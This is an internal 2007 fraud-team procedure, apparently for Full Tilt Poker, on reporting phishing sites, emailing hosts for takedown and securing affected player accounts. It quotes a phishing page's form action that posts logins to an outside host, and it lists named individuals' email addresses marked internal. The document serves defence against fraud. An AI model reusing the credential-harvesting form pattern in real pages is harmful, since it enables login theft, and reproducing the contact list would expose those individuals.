1. Tiltproof Incorporated
Document No. 5.16.1
Effective Date 04/27/2007
Handling a New Hoax Site Revision Date 07/27/2007
Approval GN
1.0
Purpose: This document establishes how to handle a new hoax site.
2.0 1) Supervisors and above.
Persons
Affected:
3.0 1) Printable version: tpfs1nwworkflow$HANDBOOKPrint
Forms, Versions5.16.1 Handling a New Hoax Site.doc
Checklists,
Flowchart:
4.0
Policy:
5.0 A) Reporting a New Hoax Site
Procedure: 1) Alert the Hoax Team at <hoaxteam@tiltproof.ca> and CC
<supervisors@tiltproof.ca> immediately if you become aware of a
new hoax website.
2) A member of the Hoax Team or a Supervisor will do the following.
3) Go to <www.dnsstuff.com> and enter the web address into the
“WHOIS” and “Abuse Lookup” fields.
4) Find out who is hosting the website, most likely Yahoo. Select “get
results with the E-mail addresses” to find the contact email address
for the hosting site.
5) Send the template email below to the contact email address/es with
the appropriate CC: from the Fraudoperations@fulltiltpoker.com
email address, and BCC: pmclaughlin@pocketkings.ie (You should
never send email to any non-Tiltproof or non-Pocket Kings party
from your personal Tiltproof.ca address.).
2. Tiltproof Incorporated
6) Follow the steps below while waiting for a reply (Section B).
7) Once you receive a reply from the company hosting the site saying
that the website has been removed, please forward to
<supsopsscsrs@tiltproof.ca>, <iimrich@ijilaw.com>, <
fraudsquad@tiltproof.ca> if they weren’t CC:ed in the reply.
a) CC the specific processor if the hoax site was asking for the
particular processors account numbers. These are
INTERNAL and not to be given to player’s.
NETELLER < Investigations@neteller.com >
MyWebATM < charles@opusfinancials.com >
ePassporte < brian.branam@epassporte.com >, and <
annelies.manuel@epassporte.com >
Click2Pay < martin.osterloh@wirecard.com >
B) Procedure to Follow While Waiting for a Reply
1) Alert the Supervisor to get a message out to the current shift about
the site, and to suggest they review the PR document in the
handbook about handling responses to hoax emails.
C) Supervisor’s Procedure to Follow While Waiting for a Reply
1) Assign someone to run a chat scan for the hoax website every 5-10
minutes.
Run the ChatScan macro or manually do this by typing
FTT_Followd chatscan 1 ".com" 1>chatscan.txt into the
command prompt
2) Add the hoax website to the
Announcements Page
Huddle Notes
[S:FTP_Fraud_DepartmentHoaxHoax Site Log.xls]
White Boards (if needed)
D) Email Template
To: (If Yahoo) <reportabuse@yahoo-inc.com>, <abuse@yahoo-inc.com>,
<copyright@yahoo-inc.com>, <domains-abuse@cc.yahoo-inc.com>
Cc: <supsopsscsrs@tiltproof.ca>, <iimrich@ijilaw.com>,
<hoaxteam@tiltproof.ca>, the processors should be CC’d when appropriate.
Content:
Hello,
It has come to our attention that you may be hosting a site which is attempting
3. Tiltproof Incorporated
to defraud customers of FullTiltPoker.com.
Please review your hosting for: _____________________
XXXFOR SCAM SITESXXX
This is a site which is attempting to "scam" users passwords for their
FullTiltPoker logins, as well as many transaction processor websites
(essentially online banks) such as NETELLER, ePassporte, PayPal, and
Moneybookers. The site is also in breach of copyright laws.
XXXFOR KEYLOGGING SITESXXX
This site attempts to install malicious key-logging software onto unsuspecting
player's computers and is in breach of copyright laws.
We request that you remove the offending site as expeditiously as possible.
Please contact us with any concerns or questions.
Thank you for your prompt cooperation in this matter.
********NAME********
On behalf of Full Tilt Poker
E) Finding a Back End Server Location
1) Open the suspected hoax site
2) Right click the webpage
3) Select “View”
4) Select “Source” or “View Source” to bring it up in text form.
5) Save a copy of this in [S: FTP_Fraud_DepartmentHOAXScam
Website Source Code] with the same name as the web address
Scam-websitedotcom.txt
6) If it is similar to our previous scam websites, it will have a “form”
that sends information to another website. It will look similar to this:
<form
action="http://00642EF.NETSOLHOST.COM/login.php"
method="post">
7) Follow the steps in “Reporting a New Hoax Site” with the web
address located next to form action.
<http://00642EF.NETSOLHOST.COM/login.php>
F) Investigating Players Affected by the Hoax Site
1) Create a new folder in [S:FTP_Fraud_DepartmentHOAX2007]
named [Hoax Site mm yy]
4. Tiltproof Incorporated
Investigators save their know100s and all related files in this
folder.
2) Start a spreadsheet tracker for all victims of this new hoax site.
G) Spreadsheet “Account Security/Limits” Section
1) Confirm that the players account is clean with no foreign logins.
2) Open their account in WAT.
a) Select the “Security & Limits” tab.
b) Select “No Play”, “No Mixed Games”, “No Chat”, “No Deposit”
and “No Transfer” for added security.
c) Select “Submit.”
3) Email the player requesting that they reset their password and contact us
back immediately.
4) Once the player writes back we can reinstate their account fully, and
give them back all privileges to the account.
5) In the spreadsheet, highlight the players account green once they have
confirmed that the password has been changed and the playing rights
have been given back.
6.0 Back End Server = is what the recent (Feb 2006) scammer used to record all
Definitions: of the account particulars. Basically there is the front end
website which is where they direct everyone to go
(www.500free-fulltiltpoker.com). Once they enter the
information, they are redirected to another website that is
hosted by a different company that is invisible to the human
eye. This is a form of disguise by the scammer to prolong the
exposure of the website and it also will protect the
information the hoaxer has received for a longer period of
time.
7.0 July 27/07
Revision BCC pmclaughlin@
July 20/07
History:
New Fraud Team email addresses and folders
Edit to email template
Added more restrictions to accounts in G)
July 5/07
New Yahoo email added to template
June 19/07
Send emails from the Operations addy
April 24/07
Email supsopsscsrs not management. Email processors when needed.
Template altered.
April 12/07